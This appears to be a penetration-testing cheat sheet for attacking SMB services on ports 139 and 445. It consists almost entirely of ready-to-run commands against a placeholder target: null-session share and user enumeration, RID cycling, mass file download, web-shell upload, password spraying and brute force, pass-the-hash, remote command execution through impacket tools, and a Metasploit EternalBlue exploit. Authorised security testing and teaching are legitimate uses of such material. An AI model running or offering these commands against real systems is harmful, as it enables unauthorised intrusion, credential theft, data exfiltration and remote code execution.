139 / 445 - SMB

Service Detection

nmap -sV -sC -p 139,445 TARGET

Enumerate Shares

smbclient

smbclient -L //TARGET -N
smbclient -L //TARGET -U user%password

CrackMapExec

crackmapexec smb TARGET -u '' -p '' --shares
crackmapexec smb TARGET -u user -p password --shares

smbmap

smbmap -H TARGET
smbmap -H TARGET -u user -p password
smbmap -H TARGET -u user -p password -R    # Recursive

enum4linux-ng

enum4linux-ng TARGET -A

Null Session

smbclient //TARGET/share -N
rpcclient -U "" -N TARGET

rpcclient Enumeration

rpcclient -U "" -N TARGET
> enumdomusers
> enumdomgroups
> queryuser 0x1f4
> querydispinfo
> lookupnames administrator
> getdompwinfo

smbclient //TARGET/sharename -U user%password

Download File

smb: \> get secret.txt
smb: \> mget *.txt

Download Everything

smbclient //TARGET/share -U user%password -c "recurse; prompt off; mget *"

Upload File

smb: \> put shell.aspx

Brute-Force / Password Spray

crackmapexec smb TARGET -u users.txt -p passwords.txt
crackmapexec smb TARGET -u users.txt -p 'Summer2024!' --continue-on-success

hydra -L users.txt -P passwords.txt smb://TARGET

User Enumeration

RID Cycling

crackmapexec smb TARGET -u '' -p '' --rid-brute

enum4linux-ng TARGET -R

impacket-lookupsid domain.local/user:password@TARGET

Command Execution

PsExec

impacket-psexec domain.local/user:password@TARGET
impacket-psexec -hashes :NTLM_HASH administrator@TARGET

WMIExec

impacket-wmiexec domain.local/user:password@TARGET

SMBExec

impacket-smbexec domain.local/user:password@TARGET

Pass-the-Hash

crackmapexec smb TARGET -u Administrator -H NTLM_HASH
impacket-psexec -hashes :NTLM_HASH Administrator@TARGET

Known Vulnerabilities

EternalBlue (MS17-010)

nmap -p 445 --script smb-vuln-ms17-010 TARGET

# Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS TARGET
run

SambaCry (CVE-2017-7494)

Linux Samba RCE via writable share:

nmap -p 445 --script smb-vuln-cve-2017-7494 TARGET

NSE Scripts

nmap -p 445 --script smb-enum-shares TARGET
nmap -p 445 --script smb-enum-users TARGET
nmap -p 445 --script smb-os-discovery TARGET
nmap -p 445 --script smb-vuln* TARGET
nmap -p 445 --script smb-protocols TARGET

Quick Reference

Check	Command
List shares	`smbclient -L //TARGET -N`
Null session	`rpcclient -U "" -N TARGET`
RID brute	`crackmapexec smb TARGET -u '' -p '' --rid-brute`
Recursive list	`smbmap -H TARGET -R`
PsExec	`impacket-psexec user:pass@TARGET`
EternalBlue	`nmap --script smb-vuln-ms17-010 TARGET`

Documentation Index

​Service Detection

​Enumerate Shares

​smbclient

​CrackMapExec

​smbmap

​enum4linux-ng

​Null Session

​rpcclient Enumeration

​Access Share

​Download File

​Download Everything

​Upload File

​Brute-Force / Password Spray

​User Enumeration

​RID Cycling

​Command Execution

​PsExec

​WMIExec

​SMBExec

​Pass-the-Hash

​Known Vulnerabilities

​EternalBlue (MS17-010)

​SambaCry (CVE-2017-7494)

​NSE Scripts

​Quick Reference

Service Detection

Enumerate Shares

smbclient

CrackMapExec

smbmap

enum4linux-ng

Null Session

rpcclient Enumeration

Access Share

Download File

Download Everything

Upload File

Brute-Force / Password Spray

User Enumeration

RID Cycling

Command Execution

PsExec

WMIExec

SMBExec

Pass-the-Hash

Known Vulnerabilities

EternalBlue (MS17-010)

SambaCry (CVE-2017-7494)

NSE Scripts

Quick Reference